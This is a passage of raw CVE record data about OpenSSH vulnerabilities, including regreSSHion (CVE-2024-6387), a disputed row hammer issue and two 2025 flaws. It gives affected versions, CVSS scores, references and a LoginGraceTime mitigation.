"x_transferred"
],
"url": "https://ubuntu.com/security/notices/USN-6859-1"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.akamai.com/blog/security-research/2024-openssh-vulnerability-regression-what-to-know-and-do"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/19904-security-advisory-0100"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-24:04.openssh.asc"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.splunk.com/en_us/blog/security/cve-2024-6387-regresshion-vulnerability.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.suse.com/security/cve/CVE-2024-6387.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.theregister.com/2024/07/01/regresshion_openssh/"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214119"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214118"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214120"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/20"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/18"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/19"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.7p1",
"status": "affected",
"version": "8.5p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:9.0::baseos",
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-12.el9_0.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-30.el9_2.4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.13::el9",
"cpe:/a:redhat:openshift:4.13::el8"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.13",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "413.92.202407091321-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.14::el9",
"cpe:/a:redhat:openshift:4.14::el8"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.14",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "414.92.202407091253-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.15::el8",
"cpe:/a:redhat:openshift:4.15::el9"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.15",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "415.92.202407091355-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.16::el9"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.16",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "416.94.202407081958-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:5"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 5",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Qualys Threat Research Unit (TRU) (Qualys) for reporting this issue."
}
],
"datePublic": "2024-07-01T08:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A security regression (CVE-2006-5051) was discovered in OpenSSH\u0027s server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-364",
"description": "Signal Handler Race Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-11T16:12:24.347Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:4312",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"name": "RHSA-2024:4340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"name": "RHSA-2024:4389",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"name": "RHSA-2024:4469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"name": "RHSA-2024:4474",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"name": "RHSA-2024:4479",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"name": "RHSA-2024:4484",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"name": "RHBZ#2294604",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-27T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-07-01T08:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: regresshion - race condition in ssh allows rce/dos",
"workarounds": [
{
"lang": "en",
"value": "The below process can protect against a Remote Code Execution attack by disabling the LoginGraceTime parameter on Red Hat Enterprise Linux 9. However, the sshd server is still vulnerable to a Denial of Service if an attacker exhausts all the connections.\n\n1) As root user, open the /etc/ssh/sshd_config\n2) Add or edit the parameter configuration:\n~~~\nLoginGraceTime 0\n~~~\n3) Save and close the file\n4) Restart the sshd daemon:\n~~~\nsystemctl restart sshd.service\n~~~\n\nSetting LoginGraceTime to 0 disables the SSHD server\u0027s ability to drop connections if authentication is not completed within the specified timeout. If this mitigation is implemented, it is highly recommended to use a tool like \u0027fail2ban\u0027 alongside a firewall to monitor log files and manage connections appropriately.\n\nIf any of the mitigations mentioned above is used, please note that the removal of LoginGraceTime parameter from sshd_config is not automatic when the updated package is installed."
}
],
"x_redhatCweChain": "CWE-364: Signal Handler Race Condition"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-6387",
"datePublished": "2024-07-01T12:37:25.431Z",
"dateReserved": "2024-06-27T13:41:03.421Z",
"dateUpdated": "2025-11-11T16:12:24.347Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-51767 (GCVE-0-2023-51767)
Vulnerability from nvd – Published: 2023-12-24 00:00 – Updated: 2025-11-18 22:03- n/a
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-18T22:03:38.917Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://arxiv.org/abs/2309.02545"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"tags": [
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"tags": [
"x_transferred"
],
"url": "https://ubuntu.com/security/CVE-2023-51767"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/01/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/01/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/28/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSSH through 10.0, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges. NOTE: this is disputed by the Supplier, who states \"we do not consider it to be the application\u0027s responsibility to defend against platform architectural weaknesses.\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T16:42:44.854Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://arxiv.org/abs/2309.02545"
},
{
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"url": "https://ubuntu.com/security/CVE-2023-51767"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/09/22/1"
}
],
"tags": [
"disputed"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-51767",
"datePublished": "2023-12-24T00:00:00.000Z",
"dateReserved": "2023-12-24T00:00:00.000Z",
"dateUpdated": "2025-11-18T22:03:38.917Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
FKIE_CVE-2025-32728
Vulnerability from fkie_nvd - Published: 2025-04-10 02:15 - Updated: 2025-05-22 16:513.8 (Low) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/013_ssh.patch.sig | Product | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/commit/fc86875e6acb36401dfc1dfb6b628a9d1460f367 | Patch | |
| cve@mitre.org | https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html | Mailing List, Product, Release Notes | |
| cve@mitre.org | https://www.openssh.com/txt/release-10.0 | Release Notes | |
| cve@mitre.org | https://www.openssh.com/txt/release-7.4 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/05/msg00008.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20250425-0002/ | Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B82BC87D-C176-4CEF-AC2A-3563C03C3DBC",
"versionEndExcluding": "10.0",
"versionStartIncluding": "7.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In sshd in OpenSSH before 10.0, the DisableForwarding directive does not adhere to the documentation stating that it disables X11 and agent forwarding."
},
{
"lang": "es",
"value": " En sshd en OpenSSH anterior a 10.0, la directiva DisableForwarding no cumple con la documentaci\u00f3n que indica que deshabilita el reenv\u00edo de X11 y del agente."
}
],
"id": "CVE-2025-32728",
"lastModified": "2025-05-22T16:51:54.890",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 1.4,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.8,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.0,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-04-10T02:15:30.873",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/013_ssh.patch.sig"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/openssh/openssh-portable/commit/fc86875e6acb36401dfc1dfb6b628a9d1460f367"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Product",
"Release Notes"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-10.0"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-7.4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00008.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20250425-0002/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-440"
}
],
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2025-26466
Vulnerability from fkie_nvd - Published: 2025-02-28 22:15 - Updated: 2025-11-03 22:185.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
| URL | Tags | ||
|---|---|---|---|
| secalert@redhat.com | https://access.redhat.com/security/cve/CVE-2025-26466 | Third Party Advisory | |
| secalert@redhat.com | https://bugzilla.redhat.com/show_bug.cgi?id=2345043 | Issue Tracking | |
| secalert@redhat.com | https://seclists.org/oss-sec/2025/q1/144 | ||
| secalert@redhat.com | https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/Feb/18 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/May/7 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2025/May/8 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.suse.com/show_bug.cgi?id=1237041 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security-tracker.debian.org/tracker/CVE-2025-26466 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20250228-0002/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/CVE-2025-26466 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2025/02/18/1 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2025/02/18/4 | Mailing List, Third Party Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt | Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | 9.5 | |
| openbsd | openssh | 9.6 | |
| openbsd | openssh | 9.6 | |
| openbsd | openssh | 9.7 | |
| openbsd | openssh | 9.7 | |
| openbsd | openssh | 9.8 | |
| openbsd | openssh | 9.8 | |
| openbsd | openssh | 9.9 | |
| openbsd | openssh | 9.9 | |
| canonical | ubuntu_linux | 24.04 | |
| canonical | ubuntu_linux | 24.10 | |
| debian | debian_linux | 11.0 | |
| debian | debian_linux | 12.0 | |
| debian | debian_linux | 13.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.5:p1:*:*:*:*:*:*",
"matchCriteriaId": "B95D97F9-56D8-4A03-8D97-C9C3BC103AEA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.6:-:*:*:*:*:*:*",
"matchCriteriaId": "2AFDD23D-3B76-4942-B222-843918EE7996",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.6:p1:*:*:*:*:*:*",
"matchCriteriaId": "EA15AB35-EE6C-4435-9CD3-02E77A581CCD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.7:-:*:*:*:*:*:*",
"matchCriteriaId": "35061B84-4628-469C-BEC2-06207F066F30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.7:p1:*:*:*:*:*:*",
"matchCriteriaId": "E0DA97F7-489E-416E-9A01-DE7E4ABB8E47",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.8:-:*:*:*:*:*:*",
"matchCriteriaId": "BF2C0441-653D-4BD3-A45D-D97C929A596F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.8:p1:*:*:*:*:*:*",
"matchCriteriaId": "63A10946-C4A4-4F77-828D-568579A2599C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.9:-:*:*:*:*:*:*",
"matchCriteriaId": "E2B53BBB-6916-478C-A896-77C7F7E7D5DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:9.9:p1:*:*:*:*:*:*",
"matchCriteriaId": "F7A2B794-BA83-4A01-BD2E-541F18CB9E37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:24.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "BF90B5A4-6E55-4369-B9D4-E7A061E797D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:24.10:*:*:*:*:*:*:*",
"matchCriteriaId": "DE07EF30-B50E-4054-9918-50EFA416073B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46D69DCC-AE4D-4EA5-861C-D60951444C6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "204FC6CC-9DAC-45FB-8A9F-C9C8EDD29D54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packages. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packages, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack."
},
{
"lang": "es",
"value": "Se ha descubierto un fallo en el paquete OpenSSH. Por cada paquete ping que recibe el servidor SSH, se asigna un paquete pong en un b\u00fafer de memoria y se almacena en una cola de paquetes. Solo se libera cuando finaliza el intercambio de claves entre el servidor y el cliente. Un cliente malintencionado puede seguir enviando dichos paquetes, lo que provoca un aumento descontrolado del consumo de memoria en el lado del servidor. En consecuencia, el servidor puede dejar de estar disponible, lo que da lugar a un ataque de denegaci\u00f3n de servicio."
}
],
"id": "CVE-2025-26466",
"lastModified": "2025-11-03T22:18:41.853",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "secalert@redhat.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-02-28T22:15:40.080",
"references": [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26466"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345043"
},
{
"source": "secalert@redhat.com",
"url": "https://seclists.org/oss-sec/2025/q1/144"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
